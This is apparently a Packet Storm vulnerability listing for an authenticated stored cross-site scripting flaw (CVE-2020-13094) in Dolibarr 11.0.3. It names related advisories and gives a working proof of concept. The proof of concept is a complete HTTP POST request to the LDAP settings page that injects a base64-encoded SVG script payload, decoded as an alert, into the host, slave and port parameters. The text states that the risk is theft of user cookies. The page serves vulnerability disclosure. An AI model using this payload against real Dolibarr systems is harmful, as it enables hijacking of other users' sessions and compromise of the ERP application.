Dolibarr 11.0.3 Cross Site Scripting

🗓️ 18 May 2020 00:00:00Reported by Mehmet KelepceType

packetstorm🔗 packetstormsecurity.com👁 221 Views

Dolibarr 11.0.3 Authenticated Cross Site Scripting vulnerability found in LDAP Synchronization Setting

Reporter	Title	Published	Views	Family All 16
0day.today	Dolibarr 11.0.3 Cross Site Scripting Vulnerability	19 May 202000:00	–	zdt
0day.today	Filetto 1.0 Denial Of Service Exploit	19 May 202000:00	–	zdt
CNVD	Dolibarr ERP/CRM Cross-Site Scripting Vulnerability (CNVD-2020-33669)	19 May 202000:00	–	cnvd
Check Point Advisories	Dolibarr Persistent Cross Site Scripting (CVE-2020-13094)	16 Aug 202000:00	–	checkpoint_advisories
CVE	CVE-2020-13094	18 May 202021:02	–	cve
Cvelist	CVE-2020-13094	18 May 202021:02	–	cvelist
EUVD	EUVD-2020-0421	7 Oct 202500:30	–	euvd
Github Security Blog	XSS in Dolibarr	21 May 202021:08	–	github
NVD	CVE-2020-13094	18 May 202022:15	–	nvd
OSV	GHSA-CXVR-R92M-Q9HW XSS in Dolibarr	21 May 202021:08	–	osv

`# Title: Dolibarr 11.0.3 Authenticated Cross Site Scripting  
# Bug: XSS - Cross Site Scripting  
# CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13094  
# Exploit-DB Author ID: 8763  
# Remotely Exploitable: Yes  
# Dynamic Coding Language: PHP  
# CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)  
# Author: Mehmet Kelepce / Gais Cyber Security  
# Date : 14-04-2020  
# Vendor: https://www.dolibarr.org/  
  
## this vulnerability was found by examining the source code.  
  
PoC : Dolibarr 11.0.3 LDAP Synchronization Settings - HTTP POST REQUEST  
##########################################################  
POST /dolibarr/admin/ldap.php?action=setvalue HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/dolibarr/admin/ldap.php?action=test  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 723  
Connection: close  
Cookie: DOLSESSID_08b25d38fe3d8c5d83c5477f93783b26=abml2gjafuuqcos5lm1053tqu6; DOLINSTALLNOPING_b832abc1aadf61021c84b3def6cdf1e6=0  
Upgrade-Insecure-Requests: 1  
  
token=%242y%2410%245CjT4.D4w8Qe.uaL.pHuSeDOW9PB2gnNQ7MhYrYUt7W8hq2R3oXBe&activesynchro=0&activecontact=0&type=activedirectory&LDAP_SERVER_PROTOCOLVERSION=3&host=%22%3E%3CEMBED+SRC%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoJ0hlbGxvLCBEb2xpYmFyciEnKTs8L3NjcmlwdD48L3N2Zz4%3D%22+type%3D%22image%2Fsvg%2Bxml%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E&slave=&port=389&dn=&usetls=0&admin=&pass=  
  
Vulnerable parameters: host,slave,port  
Payload (base64): PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoJ0hlbGxvLCBEb2xpYmFyciEnKTs8L3NjcmlwdD48L3N2Zz4=  
Payload (decode) : <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"><script type="text/ecmascript">alert('Hello, Dolibarr!');</script></svg>  
  
Parameter file: /dolibarr/admin/ldap.php  
  
## Risk : cookie information of the target user is obtained.  
`

18 May 2020 00:00Current

EPSS0.01707